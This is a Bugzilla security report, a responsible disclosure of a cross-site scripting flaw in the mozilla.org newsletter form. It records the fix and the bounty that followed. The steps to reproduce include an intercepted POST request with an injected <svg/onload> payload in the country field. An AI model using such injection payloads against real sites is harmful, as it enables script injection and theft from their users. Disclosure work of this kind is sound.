Mozilla.org is vulnerable to xss vulnerability.

Status: RESOLVED FIXED
Product: www.mozilla.org
Component: General
Reported: 3 years ago
Modified: 5 months ago
Reporter: Hamza Bettache
Assigned: pmac
Keywords: sec-high
Version: other
Hardware: x86
OS: Windows 8.1
Bug Flags: sec-bounty +
Firefox Tracking Flags: (Not tracked)
Attachments: 1

Description (Reporter, 3 years ago)

Created attachment 8542956: xss.jpg

Hello,

-Description:

My name is Hamza Bettache and I'm a web app security researcher. As I was trying to download Mozilla Firefox, I found that the newsletter form is vulnerable to an XSS vulnerability (cross-site scripting): the inputs country, lang and fmt are not sanitized (filtered), and an attacker can inject his JavaScript payload to make a successful XSS attack.

Steps to reproduce the vulnerability:

1- Go to https://www.mozilla.org/fr/newsletter/ and fill in the necessary information, using a web proxy like Burp Suite to intercept the request.

2- While intercepting the request we get the following POST:

POST /fr/newsletter/ HTTP/1.1
Referer: https://www.mozilla.org/fr/newsletter/

newsletters=mozilla-and-you&source_url=https%3A%2F%2Fwww.mozilla.org%2Ffr%2Fnewsletter%2F&email=adressss%40hotmail.fr&country=dz&lang=fr&fmt=H&privacy=on

We change one of the three parameters discussed above to our payload, which will be <svg/onload=alert("xss")>, so the request will be as follows:

POST /fr/newsletter/ HTTP/1.1
Referer: https://www.mozilla.org/fr/newsletter/

newsletters=mozilla-and-you&source_url=https%3A%2F%2Fwww.mozilla.org%2Ffr%2Fnewsletter%2F&email=adressss%40hotmail.fr&country=<svg/onload=alert("xss")>&lang=fr&fmt=H&privacy=on

and we get a pop-up message which confirms the XSS vulnerability:

Link to a JPEG image:

http://im48.gulfup.com/UtNtVe.jpg

Here's a POC (proof of concept):

http://www.youtube.com/watch?v=vk_REGut7J8&feature=youtu.be

I hope you'll fix it as soon as possible.

Regards...

Hamza.
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Firefox → mozilla.org
QA Contact: shyam
Version: unspecified → other
Group: core-security → websites-security
Comment hidden (off-topic)
Assignee: server-ops → nobody
Component: Server Operations → General
Product: mozilla.org → www.mozilla.org
QA Contact: shyam
Please be patient and wait for developers to take a look at this issue. As I said in email, January 1st is a national holiday. This bug was also opened in the wrong product and component and unlikely to be seen there.
Flags: sec-bounty?
The issue is with the AJAX-based form submission. The error messages returned can contain unsanitized user input and will thus result in the reported behavior.

I should have a fix in a PR shortly.

Thanks for the report!
Assignee: nobody → pmac
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

Comment 4 (3 years ago)
This was fixed in https://github.com/pmclanahan/bedrock/commit/55d8a0ebfab931f96903f2c3f7b7d21aa16ffe47 which is now in production.
Status: ASSIGNED → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → FIXED

Comment 5 (Reporter, 3 years ago)
Hello,
Thank you for your reply.
It's good to have the bug fixed.
I'm wondering about my bounty?
Thanks again.
Regards...
The bounty committee meets once a week. We will consider this bug the next time we meet.

Comment 7 (Reporter, 3 years ago)
Thank you.
I'm waiting to hear from you.
My regards....
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high
Blocks: 835434
Group: websites-security